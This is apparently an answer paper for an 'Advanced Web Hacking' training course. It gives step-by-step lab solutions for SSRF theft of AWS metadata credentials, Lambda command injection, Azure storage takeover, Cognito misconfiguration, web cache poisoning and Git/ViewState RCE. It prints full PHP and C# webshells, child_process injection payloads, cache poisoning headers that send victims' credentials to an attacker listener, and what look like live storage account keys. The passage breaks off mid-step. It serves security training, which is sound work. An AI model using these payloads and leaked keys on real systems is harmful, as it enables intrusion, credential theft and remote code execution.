||||||||||||||||||||

Advanced Web Hacking (Part 4)

Answer
Paper
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Contents
Module: Cloud Pentesting ................................................................................................... 2

AWS - SSRF Exploitation - Elastic Beanstalk ................................................................ 2

AWS Serverless Exploitation ....................................................................................... 13

Leaked Storage Account ............................................................................................. 19

Exploiting AWS Cognito Misconfigurations .................................................................. 27

Module: Web Cache Attacks ............................................................................................. 36

Web Cache Deception ................................................................................................ 36

Web Cache Poisoning ................................................................................................. 40

Module: Miscellaneous Vulnerabilities ............................................................................. 46

Unicode Normalization Attack ..................................................................................... 46

Second-order IDOR .................................................................................................... 51

Leverage Git misconfiguration to ViewState RCE ....................................................... 56

HTTP Desync Attacks ................................................................................................. 62

Page: | 1

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Cloud Pentesting

AWS - SSRF Exploitation - Elastic

Beanstalk
Challenge URL: http://cloud.webhacklab.com/view_pospdocument.php?doc= {}

• Identify and exploit SSRF vulnerability to gain access to S3 buckets and download the
source of the application hosted on AWS cloud.
• Upload a webshell via Continuous Deployment (CD) pipeline.

Solution:
Step 1: Navigate to the URL
“http://cloud.webhacklab.com/view_pospdocument.php?doc=https://raw.githubusercontent.com/nirh
ua/test/master/cloud-memes.jpg”

Page: | 2

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: By default Apache’s server-status page is not accessible from the internet but only via
localhost as shown below.

Step 3: Intercept the above request and provide “http://localhost/server-status” to parameter “doc”.
Due to SSRF vulnerability it is possible to read the page content as shown below.

Note: Confirming that the service provider is Amazon through server fingerprinting.

Page: | 3

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Retrieve the IAM account number, profile ID passing the metadata URL to parameter “doc”:

http://cloud.webhacklab.com/view_pospdocument.php?doc=http://169.254.169.254/latest/meta-
data/iam/info

Account number: 696XXXXX79

Instance Profile Id: AIPAIAPD5TXQPXXXXXXXX

Page: | 4

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Retrieve the region by passing the metadata URL to parameter “doc”.

http://169.254.169.254/latest/dynamic/instance-identity/document

Region: us-east-1

Page: | 5

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Navigate to the URL below for retrieving AccessKeyId, SecretAccessKey and Token:

http://cloud.webhacklab.com/view_pospdocument.php?doc=http://169.254.169.254/l
atest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role

Page: | 6

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Setup AWS Command Line Interface (CLI) using Kali Terminal.

root@kali:~# export AWS_ACCESS_KEY_ID=ASIA2EG3F.............

root@kali:~# export AWS_SECRET_ACCESS_KEY=mhEI+cQUGIy79XMqm6nlXrV……...

root@kali:~# export AWS_DEFAULT_REGION=us-east-1

root@kali:~# export AWS_SESSION_TOKEN=FQoGZXIvYXdzEIf//////////wEaDCaPfjkbqj20….

Page: | 7

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Access S3 bucket using the Kali Terminal.

root@kali:~# aws s3 ls

As shown access is denied, this could be due to security policies.

Step 9: The managed policy “AWSElasticBeanstalkWebTier” by default only allows to access S3

buckets whose name start with “elasticbeanstalk”

Reference: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html

To access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an
Amazon S3 bucket named elasticbeanstalk-region-account-id for each region in which you create
environments with role aws-elasticbeanstalk-ec2-role. Elastic Beanstalk uses this bucket to store
objects, for example temporary configuration files, that are required for the proper operation of your
application.

• http://169.254.169.254/latest/meta-data/iam/info -
o "InstanceProfileArn" : "arn:aws:iam::6XXXXXX79:instance-profile/aws-
elasticbeanstalk-ec2-role",
• http://169.254.169.254/latest/user-data
o Access Zone information

Page: | 8

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: Use AWS CLI to gain access to the bucket

root@kali:~# aws s3 ls s3://elasticbeanstalk-region-account-id/ --recursive

Example: aws s3 ls s3://elasticbeanstalk-us-east-1-6XXXXX79/ --recursive

Step 11: To download the source code use the following command:

root@kali:~# aws s3 cp s3://elasticbeanstalk-us-east-1-6XXXXX79/ {destination

local path} --recursive

Page: | 9

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Pivoting from SSRF to RCE

The software release, in this case, is automated using AWS Pipeline, S3 bucket as a source
repository and Elastic Beanstalk as a deployment provider. AWS CodePipeline is a CI/CD service
which builds, tests and deploys code every time there is a change in code (based on the policy). The
Pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source provider and multiple
deployment providers including Elastic Beanstalk. The AWS official blog on how this works can be
found here.

Step 12: Create a new PHP file (webshell) as shown in Figure:

File: webshell00X.php

<html>

<body>

<form method="get" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">

<input type="text" name="call" id="call" size="80">

<input type="submit" value="go">

</form>

<pre>

<h1> My Webshell 1001 </h2>

<?php

if($_GET['call'])

system($_GET['call']);

Page: | 10

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

?>

</pre>

</body>

</html>

Step 13: Add newly created file to the 2019028gtB-InsuranceBroking-stag-v2.0024.zip file as shown
below:

root@kali:~# zip -ur 2019028gtB-InsuranceBroking-stag-v2.0024.zip

webshell00X.php

Step 14: To check if the file has been added to the zip run the command and locate the shell file:

root@kali:~# vi 2019028gtB-InsuranceBroking-stag-v2.0024.zip

Page: | 11

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 15: Now, upload an archive file to S3 bucket using the AWS CLI command, as shown in
Figure:

root@kali:~# aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip

s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/

Step 16: The moment the new file is updated, CodePipeline immediately starts the build process
and if everything is OK, it will deploy the code on the Elastic Beanstalk environment.

Once the pipeline is completed, we can then access the web shell and execute arbitrary commands
to the system, as shown below.

http://cloud.webhacklab.com/webshell00X.php

We successfully have an RCE!

Page: | 12

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

AWS Serverless Exploitation

Challenge URL: https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-
lambda-demo?query='notsosecure'

• Identify and exploit Remote Code Execution vulnerability in the Lambda function
• Obtain Secret Tokens
• Gain access to S3 bucket
• Connect to EC2 instance

Solution:
Step 1: Navigate to our serverless lambda application which takes input from the “query” parameter.
Notice how the input from the query parameter is getting reflected back on the page.

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-
demo?query='notsosecure'

Page: | 13

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Evaluate the expression by passing 5*5 in the query parameter. The expression was
evaluated which implies that the lambda function would evaluate any command provided as an input
leading to a remote code execution.

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-
demo?query=5*5

Step 3: Now that the application is evaluating the expressions, inject the function “require” to
execute commands on the host to read the content of the file “/etc/passwd” as shown below:

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-
demo?query=require(%27child_process%27).execSync(%27cat%20/etc/passwd%27);

Page: | 14

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Now that we can execute operating system level commands and we also know that this is
an Amazon instance let's read the environment variable to get access to the AWS keys which are
generally stored as an environment variable. “Env” command will print all the environment variables
associated with the privileges with which the application is running.

https://8nfjm12vx0.execute-api.us-east-2.amazonaws.com/default/awh-lambda-
demo?query=require(%27child_process%27).execSync(%27env%27);

Step 5: Setup AWS Command Line Interface (CLI) using Kali Terminal.

root@kali:~# export AWS_ACCESS_KEY_ID=ASIA2EG3F6XXXXXXXXXX

root@kali:~# export AWS_SECRET_ACCESS_KEY=9STIiddjS/D/XXXXsCM7Yj1IMaUmXXXXXXXXX

root@kali:~# export AWS_DEFAULT_REGION=us-east-2

root@kali:~# export AWS_SESSION_TOKEN= IQoJb3JpZ2luX2VjEOr//////////wEa………….

Page: | 15

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Run “aws_enum” script to discover AWS services which a following set of AWS credentials
has access to (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,
AWS_SESSION_TOKEN)

root@kali:~/tools/# python3 aws_enum.py --access-key ASIA2EG3F6XXXXXXXXXX --

secret-key 9STIiddjS/D/XXXXsCMtbG7Yj1IMaUmXXXXXXXXX --session-token
AgoJb3JpZ2luX2VjEGYaCXVzLWV... --region us-east-2

Note: The AWS keys which were compromised are having read access on S3 bucket, EC2
Instances and SecretsManager.

Page: | 16

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Let us access “nss-lambda-demo” s3 bucket and search for some juicy information.As
observed this s3 bucket is containing the “aws-ec2-solr.pem” file which is nothing but a private key
of another internal server.

root@kali:~/tools/# python3 aws_enum.py --access-key ASIA2EG3F6XXXXXXXXXX --

secret-key 9STIiddjS/D/XXXXsCMtbG7Yj1IMaUmXXXXXXXXX --session-token
AgoJb3JpZ2luX2VjEGYaCXVzLWV... --region us-east-2 --command "aws s3 sync
s3://nss-lambda-demo lambda-demo-files"

Step 8: We don't know which server can be accessed using the “aws-ec2-solr.pem” file. Hence let
us list all the EC2 instances that are associated with the AWS keys compromised earlier.

root@kali:~/tools/# python3 aws_enum.py --access-key ASIA2EG3F6XXXXXXXXXX --

secret-key 9STIiddjS/D/XXXXsCMtbG7Yj1IMaUmXXXXXXXXX --session-token
AgoJb3JpZ2luX2VjEGYaCXVzLWV... --region us-east-1 --command "aws ec2 describe-
instances"

Page: | 17

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

As you may have seen , the output of the “ec2 describe instances” command is voluminous. Hence
we may need to save the output in a text file and then search for the keyname “aws-ec2-solr.pem”.
Upon doing the same it was found that the key file obtained belongs to the instance “i-
0c81d2e81dee1ebfc”

Step 9: From the instance details we can now find the EC2 public DNS which is “ec2-34-229-88-
54.compute-1.amazonaws.com”. Let us now connect to this public DNS using the previous obtained
key file to complete our task.

root@kali:~/tools/# chmod 400 aws-ec2-solr.pem

root@kali:~/tools/# ssh -i aws-ec2-solr.pem ec2-user@ec2-34-229-88-54.compute-
1.amazonaws.com

Page: | 18

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Leaked Storage Account

Challenge URL: N/A

• Extract the source code and achieve Remote Code Execution for the function from the
storage account of “notsosporty" using the techniques learned in this module.

Solution:
Step 1: To access the exposed Azure AccountName and AccountKey use keywords specific to
Azure like DefaultEndpointsProtocol, AccountName, AccountKey etc. and the target name (i.e.
notsosecure-org) in GitHub search feature.

https://github.com/search?q=notsosporty

Some of the examples are as follows:

• https://github.com/search?q=notsosporty&type=Users
• https://github.com/search?q=notsosporty
• https://github.com/search?q=user%3Anotsosporty+AccountName&type=Code
• https://github.com/search?q=user%3Anotsosporty+AccountKey&type=Code
• https://github.com/search?q=user%3Anotsosporty+azure&type=Repositories

Page: | 19

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Access the exposed Azure AccountName and AccountKey found in previous step.

Step 3: To validate the existence of file share for the acquired AccountName and Accountkey use
the below command on Azure CLI

root@kali:~/Desktop/test_azure# az storage share exists --account-name

fnappvta035 --account-key
HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx
78mbyXQw== --name fnappvta035

Page: | 20

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Download the content present in the file share detected in previous step by using the
following command:

root@kali:~/Desktop/test_azure# az storage file download-batch --account-name

fnappvta035 --account-key
HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx
78mbyXQw== --destination . --source fnappvta035 --no-progress

Step 5: On downloading the source code, it is observed that there are C# scripts in use, the same
can be confirmed by viewing the contents of the file (run.csx) as shown below:

root@kali:~/Desktop/test_azure# cat site/wwwroot/HttpTrigger1/run.csx

Page: | 21

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: In order to achieve remote code execution on the target function, update the following
webshell code in “site/wwwroot/HttpTrigger1/run.csx” file

#r "Newtonsoft.Json"

using System.Net;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Primitives;
using Newtonsoft.Json;
using System;
using System.IO;
using System.Diagnostics;

public static async Task<IActionResult> Run(HttpRequest req, ILogger log)

{
log.LogInformation("C# HTTP trigger function processed a request.");

string cmd = req.Query["cmd"];

string requestBody = await new StreamReader(req.Body).ReadToEndAsync();

dynamic data = JsonConvert.DeserializeObject(requestBody);
cmd = cmd ?? data?.cmd;

return cmd != null

? (ActionResult)new OkObjectResult(ExcuteCmd(cmd))
: new BadRequestObjectResult("Please pass a name on the query string
or in the request body");
}

public static string ExcuteCmd(string arg)

{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}

Page: | 22

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: The updated “run.csx” file will contain webshell code as shown below:

root@kali:~/Desktop/test_azure# cat site/wwwroot/HttpTrigger1/run.csx

Step 8: Copy the “HttpTrigger1” folder to “HttpTriggerX” (replace x with your userid)

root@kali:~/Desktop/test_azure# cp -r site/wwwroot/HttpTrigger1
site/wwwroot/HttpTriggerX

Page: | 23

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 9: Now, we can upload all the files present in “/root/site/wwwroot/HttpTriggerX/“ on the local
system to Azure storage account.

root@kali:~/Desktop/test_azure# az storage file upload-batch --account-key

HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx
78mbyXQw== --account-name fnappvta035 --destination fnappvta035 --destination-
path site/wwwroot/HttpTriggerX/ --source
/root/{localpath}/site/wwwroot/HttpTriggerX/

Step 10: Now, the next step is to find out the Function API URL.

We will first find the container name associated to the account using command mentioned below:

root@kali:~/Desktop/test_azure# az storage container list --account-name

fnappvta035 --account-key
HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx
78mbyXQw==

Page: | 24

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Once we can access the container names, download the BLOB associated with this
container (azure-webjobs-secrets) using the command mentioned below:

root@kali:~/Desktop/test_azure# az storage blob download-batch --account-name

fnappvta035 --account-key
HApIrSbCEBWCWQVnvcUXfrNvbzIwwUzIZH3lUkQeQI5uOqv7QGmGrf4L/aPYnSw2PqbHdEjxsY16Bx
78mbyXQw== --destination . --source azure-webjobs-secrets

Step 12: By exploring the “fnappvt/host.json” file we can locate the function URL

root@kali:~/Desktop/test_azure# cat fnappvt/host.json

Page: | 25

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 13: Access the webshell using the URL identified in the above step:

URL: https://fnappvt.azurewebsites.net/api/HttpTriggerX?cmd=dir

Page: | 26

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Exploiting AWS Cognito

Misconfigurations
Challenge URL: http://cognito.webhacklab.com/

• Identify AWS cognito misconfiguration and read the secrets from the secret manager.

Solution:
Step 1: Access the application hosted at http://cognito.webhacklab.com . It can be observed that the
application does not allow registration to the public.

Page: | 27

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: On accessing the HTML source, observe that there is a file named ‘config.js’. Access the file
and view the content.

Step 3: On accessing the file, a config file related to AWS Cognito containing ‘userPoolId’,
‘identityPoolId’ and ‘clientId’ can be found. This information helps us understand that the application
uses AWS Cognito JavaScript SDK to authenticate users.

Page: | 28

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: Now try to sign up to the application using the given configuration. Use the below command
to signup and create an account.

root@kali:~# aws cognito-idp sign-up --client-id m8ca1fea9uico5qml43na3fp --

username userX@webhacklab.com --password P@ssw0rd1 --user-attributes
Name="email",Value="userX@mailinator.com" Name="name",Value="UserX"

Step 5: Once the account is created a verification code is sent on the email. Use this code to
activate the user.

Page: | 29

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 6: Use the above code along with the client-id and username to verify the user using the
following command.

Note: Once the command executes successfully there will be no output.

root@kali:~# aws cognito-idp confirm-sign-up --client-id

m8ca1fea9uico5qml43na3fp --username=userX@webhacklab.com --confirmation-code
XXXXXX

Step 7: Login to the application with the newly activated credentials.

Page: | 30

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: The user is successfully logged in but does not have any authorization over the application
as shown in the figure below.

Step 9: Once the above user is authenticated successfully the application generates ‘accessToken,
‘idToken’ and ‘refreshToken’ and these are stored in the browser’s local storage. To access these
values go to the browser inspector feature of the above page (step 8) and check the storage cache.

Step 10: Alternatively, you can also go to Burp and check the response of the login action. It
contains ‘accessToken, ‘idToken’ and ‘refreshToken’.

Page: | 31

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 11: Capture the IdentityPoolName.

Page: | 32

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 12: Generate an authenticated Cognito identity id using the ‘IdToken’, ‘IdentityPoolid’ and
‘IdentityPoolName’ as shown below:

root@kali:~# aws cognito-identity get-id --identity-pool-id us-east-

1:d7f1908a-a2f8-4c6e-b6b1-9060d9830fb3 --logins cognito-idp.us-east-
1.amazonaws.com/us-east-1_EOn8m3ula=<IdToken>

Step 13: Use the ‘IdentityId’ obtained from the above step to create temporary AWS credentials
using the ‘IdToken’, ‘IdentityPoolid’ and ‘IdentityPoolName’ as shown below:

root@kali:~# aws cognito-identity get-credentials-for-identity --identity-id

us-east-1:85948f47-1237-479a-a9e8-ab021747cae5 --logins cognito-idp.us-east-
1.amazonaws.com/us-east-1_EOn8m3ula=<Id Token>

Page: | 33

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 14: Configure the AWS Command Line Interface(CLI) to interact with the AWS services using
the details obtained above in the command as shown below:

root@kali:~# export AWS_ACCESS_KEY_ID=XXXXXXXXX

root@kali:~# export AWS_SECRET_ACCESS_KEY=XXXXXXXXX

root@kali:~# export AWS_SESSION_TOKEN=XXXXXXXXX

root@kali:~# export AWS_DEFAULT_REGION=us-east-1

Step 15: Execute the following command to verify the validity of AWS client credentials configured
in the above step using the command as shown:

root@kali:~# aws sts get-caller-identity

Page: | 34

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 16: Since the objective is to obtain the secrets from the secret manager let’s query the
‘secretsmanager’ service using the current session. Enter the commands as shown below:

root@kali:~# aws secretsmanager list-secrets

Step 17: The output shows that there is a ‘Cloud_API’ secret available. Query the secret-id using
the command to decrypt and retrieve the encrypted secret information as shown below.

root@kali:~# aws secretsmanager get-secret-value --secret-id

arn:aws:secretsmanager:us-east-1:6962XXXXX9:secret:Cloud_API-zpPdXO

Page: | 35

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Web Cache Attacks

Web Cache Deception

Challenge URL: http://webcache.webhacklab.com:8080/login.php

• Identify Web Cache Deception vulnerability to access sensitive content without

authentication, which would otherwise be only accessible to an authenticated User.

Solution:
Step 1: Navigate to http://webcache.webhacklab.com:8080/login.php. Try to access index.php i.e.
http://webcache.webhacklab.com:8080/index.php. It will not be accessible and will keep redirecting
to the authentication page as it requires authentication to be accessed.

Page: | 36

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Try adding any non-existent static file location, for example non-existent.css to end of the
URL (i.e. http://webcache.webhacklab.com:8080/login.php/non-existent.css ). Observe if the
application loads login.php instead. And we can also observe from header “X-cache” that our server
caches public static files.

Note: We could also use public static file extensions like gif, png, ico etc.

Page: | 37

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: To exploit this, Login to application using creds username1:password1 . After login, you
will be taken to http://webcache.webhacklab.com:8080/index.php page. Now, armed with the
knowledge in the previous step, again add a non-existent public static file to the end of the URL.
(e.g: http://webcache.webhacklab.com:8080/index.php/non-existent.css ) and submit it. This will
cache contents of index.php on the server with file index.php/non-existent.css .

Page: | 38

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 4: As the cache on the server is created, access the same link from different browsers or from
different remote locations to retrieve contents on “index.php” without authentication.

http://webcache.webhacklab.com:8080/index.php/non-existent.css

Page: | 39

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Web Cache Poisoning

Challenge URL: http://webcache.webhacklab.com/

• Identify whether there are any unkeyed inputs used by the application and if the server
caches the output for the same. Edit those unkeyed inputs with malicious payloads to
do the following to random user when poisoned cache is requested.

a) Perform Cross-Site Scripting

b) Execute malicious script from remote location controlled by us

c) Steal Credentials through Form submission to remote location controlled by us.

Note: TTL of cache is set to 20 sec.

Solution:
Step 1: Navigate to http://webcache.webhacklab.com/ and observe that the host header is used by
the application in multiple places in response.

Page: | 40

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Next let’s determine if we can override “host” header value with our custom one using
alternative headers like “X-Forwarded-Host”. It seems we can, as shown below.

X-Forwarded-Host: test123

Page: | 41

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

A. Cross-site Scripting:
Step 3: After above step wait for 20 sec for cache to become invalid, then submit below Header with
custom XSS payload. After submission response will be cached on the varnish server.

X-Forwarded-Host: <script>prompt('Password')</script>

Step 4: Response is cached. Try accessing the same page from other IPs or browsers. You will
access the cached page resulting in XSS.

Page: | 42

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

B. Execute malicious script from Remote location controlled by us.

Step 5: Similarly, as we observed that on submitting Headers ‘X-NotSoSecure-Script’ it modified
script loading location. Therefore, we submitted below Header with a remote server containing
different JavaScript but with the same name.

X-NotSoSecure-Script: 192.168.4.X:1234

Step 6: Cache is poisoned. When a random user accesses the same cached page from a different
location or browser. It loads the malicious script from a remote machine controlled by us and
executes it.

Page: | 43

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

C. Steal Credentials through From submission

Step 7: Similarly, we observe that we can use “X-Steal-Creds” header to poison from URL to send
authentication credentials to a remote server. For this submit below Header with payload.

X-Steal-Creds: 192.168.4.X:1234

Page: | 44

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: As soon as a random user submits his credentials on the poisoned cached page.
Credentials are sent to our listener as shown in the below figure.

nc -lvp 1234

Page: | 45

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Module: Miscellaneous
Vulnerabilities

Unicode Normalization Attack

Challenge URL: http://reimbursement.webhacklab.com/Account/ResetPassword

• Identify and exploit the forgot password functionality to login as userX

Solution:
Step 1: Login to the 'Expense Reimbursement' application using your registered account. Here, we
have used 'john' as a victim user account.

Note: To see the normalized characters working in your current version of Firefox browser, an
additional dependency is required which is already installed in our custom kali.

Run the following command in case you want to test on a different system:

root@kali:~# sudo apt-get install ttf-ancient-fonts

Page: | 46

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 2: Register to the 'Expense Reimbursement' application by entering unicode characters as a

username. Here, we have used 'ⒿⓄⒽⓃ' user account you can refer to Online Unicode Tool or
Unicode Charsets.

Page: | 47

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Initiate the Forgot Password request and input the unicode characters as a username. For
instance, here we have entered 'ⒿⓄⒽⓃ' as a username to reset the password.

Step 4: In another browser (or private browsing window), open your mailbox to see the received
password reset link → Click the link to reset the password.

Page: | 48

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: You will be redirected to the Reset Password page. Enter the new password as desired and
the username must be the same as mentioned above ('ⒿⓄⒽⓃ'). Here, we have set a new
password as 'New@1234'.

Step 6: After submitting the above data, the password has been reset for both 'john' user as well as '
ⒿⓄⒽⓃ' user. This happened due to the application’s nature of handling or working with unicode
characters.

Page: | 49

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: The password for user 'john' is now set to a new password 'New@1234'.

Page: | 50

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Second-order IDOR
Challenge URL: http://reimbursement.webhacklab.com/Expense/LoadExpenseFile?id=

• Exploit Second-order IDOR to view reimbursement details of another user on the

application who owns id = 1, 2, 3

Solution:
Step 1: Login to the Expense Reimburse application using your registered account and navigate to
the 'Expense' tab. Here, we have used 'john' as an existing user account.

Step 2: Download a sample (SampleData.xls) file from user 'john' account

Page: | 51

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Manipulate the excel data ‘Amount’ to your desired reimbursement amount.

Step 4: Navigate to the 'Add Expense' feature which allows users to upload a file in XLS format.
Upload the .xls file 'SampleData.xls' (located in kali → '/root/Downloads').

Page: | 52

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: File is uploaded successfully as shown below.

Step 6: Access the uploaded file listed in 'View All Expenses', it will show you the expenses
uploaded in the excel file.

Step 7: Capture the request when you access the uploaded file in Burp:

Page: | 53

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 8: Send the captured request to Repeater. This request will be used at a later stage. Now,
from the main proxy tab send the request and capture the response, the response is 302 with a
redirect to ‘/Expense/Success’ which states that the id passed in the request belongs to the logged
in user, do not forward this response yet:

Step 9: Go to the Repeater tab and change the id value to 3 and send the Request, it should look
like below:

Page: | 54

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 10: Go back to the Proxy tab and forward the response, once the response is forwarded you
will be able to access and view reimbursement details of the user having reimbursement id 3.

Page: | 55

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Leverage Git misconfiguration to

ViewState RCE
Challenge URL: http://books.webhacklab.com/.git

• Leverage Git misconfiguration to extract the Machine Key.

• Exploit ViewState to perform Remote Code Execution(RCE)

Solution:
Step 1: Navigate to 'http://books.webhacklab.com/.git/HEAD' and server will respond with content
as shown in the figure:

Step 2: Run 'git-dumper' tool to extract the source code as shown in the figure:

Command:

root@kali:~/tools/git-dumper-master# ./git-dumper.py
http://books.webhacklab.com/.git <OUTPUT_DIR> -t 30

Page: | 56

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 3: Navigate to the downloaded Git repository and analyze the source code which contains
web.config as shown in the figure:

Step 4: Extract the Machine Key information from the web.config file as shown in Figure:

Page: | 57

©
Claranet Cyber Security 2021. All rights reserved

Technet24
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 5: Login to the application using your registered account:

Step 6: Capture the request in Burp Suite and observe that the '__VIEWSTATE' parameter is
passed in request and it is in an encrypted form as shown in the figure:

Page: | 58

©
Claranet Cyber Security 2021. All rights reserved
||||||||||||||||||||

NSS Training – AWH 5D Answer Paper

Step 7: Start python web server on port 8000

python3 -m http.server

Step 8: Generate the ViewState deserialization payload using 'utility.webhacklab.com' where

